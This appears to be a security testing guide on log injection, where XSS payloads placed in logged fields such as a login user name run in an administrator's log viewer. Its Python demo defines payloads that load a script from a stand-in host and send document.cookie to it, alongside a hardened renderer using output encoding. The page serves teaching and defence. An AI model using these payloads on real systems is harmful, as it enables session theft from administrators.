Application Log Injection


Overview

Application Log Injection occurs when an application writes user-supplied input into its logs and the component that displays those logs has a client-side vulnerability such as cross-site scripting (XSS). For example, if the logs are stored in HTML format and viewed in a browser, a script placed in a logged field by an attacker can execute in the browser of whoever views the log, typically an administrator.

Discovery Methodology

To discover vulnerabilities in the log viewer, it is often best to download and install a copy of the target application locally, identify which input fields are written to the log and how the log is rendered, and then apply standard web application testing techniques to the viewer.

Exploitation

Cross-site scripting tends to be the easiest and most prevalent vulnerability in HTML-based application log viewers. Send browser hook scripts and other XSS payloads into fields that are logged, then wait for an administrator to view the logs; the payload runs in the administrator's browser, with the administrator's session.

Example

The user name entered on the login page is logged to the application log. Enter a cross-site scripting payload in the user name field (the login does not need to succeed, since the user name is logged either way). Visit the View Log page. Check that the XSS executes.
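The example above worked through in code (added here; it is not from the original page and does not describe any particular product). A naive login handler logs the user name verbatim, a vulnerable viewer interpolates log entries straight into HTML, and a hardened viewer entity-encodes each entry first. The attacker host attacker.example, the payload strings and the log format are all constructed for the illustration.

```python
import html

# Constructed attacker payloads (hypothetical host attacker.example): a "hook"
# that loads a remote script, and an event-handler variant for viewers that
# strip <script> tags but leave attributes alone.
HOOK_PAYLOAD = '<script src="http://attacker.example/hook.js"></script>'
IMG_PAYLOAD = '<img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">'

LOG_TIMESTAMP = "2024-01-01T00:00:00Z"  # fixed so the output is deterministic


def log_login_attempt(log, username, success):
    """Append a login record the way a naive application does: user input verbatim."""
    log.append(f"{LOG_TIMESTAMP} login user={username} success={success}")
    return log


def render_log_vulnerable(entries):
    """Log viewer that interpolates raw entries into HTML with no output encoding."""
    rows = "".join(f"<tr><td>{entry}</td></tr>" for entry in entries)
    return f"<table>{rows}</table>"


def render_log_hardened(entries):
    """Same viewer with HTML entity encoding applied to each entry before insertion."""
    rows = "".join(f"<tr><td>{html.escape(entry, quote=True)}</td></tr>" for entry in entries)
    return f"<table>{rows}</table>"


def markup_survives(page):
    """Tester's check: did the injected tags reach the page as live markup?

    Entity-encoded output contains '&lt;script' rather than '<script', so this
    distinguishes a payload that will execute from one rendered as text.
    """
    return any(tag in page for tag in ("<script", "<img"))


def demo():
    """Log one legitimate and two malicious login attempts, render both ways."""
    log = []
    log_login_attempt(log, "alice", True)
    log_login_attempt(log, HOOK_PAYLOAD, False)
    log_login_attempt(log, IMG_PAYLOAD, False)
    return {
        "vulnerable": markup_survives(render_log_vulnerable(log)),
        "hardened": markup_survives(render_log_hardened(log)),
    }


if __name__ == "__main__":
    result = demo()
    print("payload executes in vulnerable viewer:", result["vulnerable"])
    print("payload executes in hardened viewer:", result["hardened"])
```

The fix is output encoding at the point where log text is placed into HTML; filtering on the way into the log is not sufficient, because the log is also consumed by other tools and a second payload form (here the img/onerror variant) will slip past a filter that only strips script tags.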

Videos



Sending Persistent Cross-site Scripts into Web Logs to Snag Web Admin (video)